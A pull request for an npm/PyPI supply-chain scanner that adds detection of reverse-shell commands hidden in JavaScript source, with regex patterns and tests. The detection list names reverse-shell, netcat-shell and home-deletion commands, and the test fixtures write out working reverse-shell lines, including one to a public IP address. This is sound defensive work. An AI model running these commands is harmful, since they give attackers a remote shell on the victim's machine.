### PR TITLE
v2.11.122 - fix: reverse shell detection in JS source (SHELL-023)

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.121",
+  "version": "2.11.122",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.121",
+      "version": "2.11.122",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.5.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.121",
+  "version": "2.11.122",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/scanner/shell.js
+++ b/src/scanner/shell.js
@@ -8,7 +8,7 @@ const SHELL_EXCLUDED_DIRS = ['node_modules', '.git', '.muaddib-cache'];
 const MALICIOUS_PATTERNS = [
   { pattern: /curl[^\n]{0,5000}\|[^\n]{0,5000}sh/m, name: 'curl_pipe_shell', severity: 'HIGH' },
   { pattern: /wget[^\n]{0,5000}&&[^\n]{0,5000}chmod[^\n]{0,5000}\+x/m, name: 'wget_chmod_exec', severity: 'HIGH' },
-  { pattern: /bash\s+-i\s+>&\s+\/dev\/tcp/m, name: 'reverse_shell', severity: 'CRITICAL' },
+  { pattern: /(?:ba)?sh\s+-i\s+>&\s*\/dev\/tcp/m, name: 'reverse_shell', severity: 'CRITICAL' },
   { pattern: /nc\s+-e\s+\/bin\/(ba)?sh/m, name: 'netcat_shell', severity: 'CRITICAL' },
   { pattern: /rm\s+-rf\s+(~\/|\$HOME|\/home)/m, name: 'home_deletion', severity: 'CRITICAL' },
   { pattern: /shred.*\$HOME/m, name: 'shred_home', severity: 'CRITICAL' },
@@ -40,13 +40,26 @@ const MALICIOUS_PATTERNS = [
 
 const SHEBANG_RE = /^#!.*\b(?:ba)?sh\b/;
 
-function scanFileContent(file, content, targetPath, threats) {
+// Source files (.js/.ts/...) can embed shell reverse-shell commands inside
+// child_process exec/execSync/spawn string args. shell.js historically scanned only
+// .sh/shebang files, so `execSync("bash -i >& /dev/tcp/...")` in index.js was invisible
+// (missed npx-whoami-demo, 2026-06 — a revshell that scored grs 25 with type_reverse_shell=0).
+// Apply ONLY the unambiguous reverse-shell command patterns to source files — NOT the
+// context-dependent ones (curl|sh, systemctl, rm -rf, base64|sh) which would false-positive
+// on JS string literals / build tooling. FPR-gate (2026-06-19): these 4 matched 0 port-check
+// idioms (</dev/tcp, echo >/dev/tcp, nc -z) and 0 node_modules .js files.
+const SOURCE_SCAN_PATTERN_NAMES = new Set([
+  'reverse_shell', 'netcat_shell', 'fifo_reverse_shell', 'fifo_nc_reverse_shell'
+]);
+const SOURCE_SCAN_EXTENSIONS = ['.js', '.cjs', '.mjs', '.ts', '.jsx', '.tsx'];
+
+function scanFileContent(file, content, targetPath, threats, patterns = MALICIOUS_PATTERNS) {
   // Strip comment lines to avoid false positives on documentation
   const activeContent = content.split(/\r?\n/)
     .filter(line => !line.trimStart().startsWith('#'))
     .join('\n');
 
-  for (const { pattern, name, severity } of MALICIOUS_PATTERNS) {
+  for (const { pattern, name, severity } of patterns) {
     if (pattern.test(activeContent)) {
       threats.push({
         type: name,
@@ -105,6 +118,14 @@ async function scanShellScripts(targetPath) {
       }
     } catch (e) { debugLog('[SHELL] readFile error:', e?.message); }
   }
+
+  // Pass 3: source files (.js/.ts/...) — only the unambiguous reverse-shell command
+  // patterns (revshell commands embedded in child_process exec/spawn string args).
+  const sourcePatterns = MALICIOUS_PATTERNS.filter(p => SOURCE_SCAN_PATTERN_NAMES.has(p.name));
+  const sourceFiles = findFiles(targetPath, { extensions: SOURCE_SCAN_EXTENSIONS, excludedDirs: SHELL_EXCLUDED_DIRS });
+  forEachSafeFile(sourceFiles, (file, content) => {
+    scanFileContent(file, content, targetPath, threats, sourcePatterns);
+  });
 
   return threats;
 }

--- a/tests/scanner/shell.test.js
+++ b/tests/scanner/shell.test.js
@@ -417,6 +417,45 @@ async function runShellTests() {
     const p4 = getPlaybook('npm_token_steal');
     assert(p4.includes('npm') || p4.includes('token'), 'Playbook should reference npm or token');
   });
+
+  // SHELL-023 (2026-06-19): reverse-shell command strings embedded in JS source
+  // (child_process exec/execSync/spawn) — shell.js historically only scanned .sh/shebang
+  // files, so npx-whoami-demo's `execSync("bash -i >& /dev/tcp/...")` in index.js was missed.
+  await asyncTest('SHELL-023: JS execSync reverse shell (bash -i >& /dev/tcp) → reverse_shell', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-shell-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'rs-js', version: '1.0.0' }));
+    fs.writeFileSync(path.join(tmp, 'index.js'),
+      'const { execSync } = require("child_process");\nexecSync("bash -c \\"bash -i >& /dev/tcp/101.43.232.7/7777 0>&1\\"");');
+    try {
+      const result = await runScanDirect(tmp);
+      const t = (result.threats || []).find(x => x.type === 'reverse_shell');
+      assert(t, 'reverse shell in JS execSync string should be detected (shell.js source pass)');
+      assert(t.severity === 'CRITICAL', `Expected CRITICAL, got ${t && t.severity}`);
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('SHELL-023: JS /dev/tcp port-check (</dev/tcp) does NOT fire reverse_shell', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-shell-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'portcheck-js', version: '1.0.0' }));
+    fs.writeFileSync(path.join(tmp, 'health.js'),
+      'const { execSync } = require("child_process");\nexecSync("timeout 1 bash -c \\"</dev/tcp/127.0.0.1/5432\\"");');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(!(result.threats || []).find(x => x.type === 'reverse_shell'),
+        'Port-check idiom </dev/tcp must NOT trip reverse_shell');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('SHELL-023: sh -i variant in .sh still fires reverse_shell', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-shell-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'rs-sh', version: '1.0.0' }));
+    fs.writeFileSync(path.join(tmp, 'run.sh'), '#!/bin/sh\nsh -i >& /dev/tcp/10.0.0.5/9001 0>&1');
+    try {
+      const result = await runScanDirect(tmp);
+      assert((result.threats || []).find(x => x.type === 'reverse_shell'),
+        'sh -i >& /dev/tcp variant should fire reverse_shell');
+    } finally { cleanupTemp(tmp); }
+  });
 }
 
 module.exports = { runShellTests };


### PR DESCRIPTION
shell.js Pass 3: scan JS/TS source for embedded reverse shell commands. Catches execSync('bash -i >& /dev/tcp/...') missed by shell-only scanning. 4 safe patterns only. FPR-gate 0/corpus. Unblocks ML clean model activation. 3 tests, 39/0.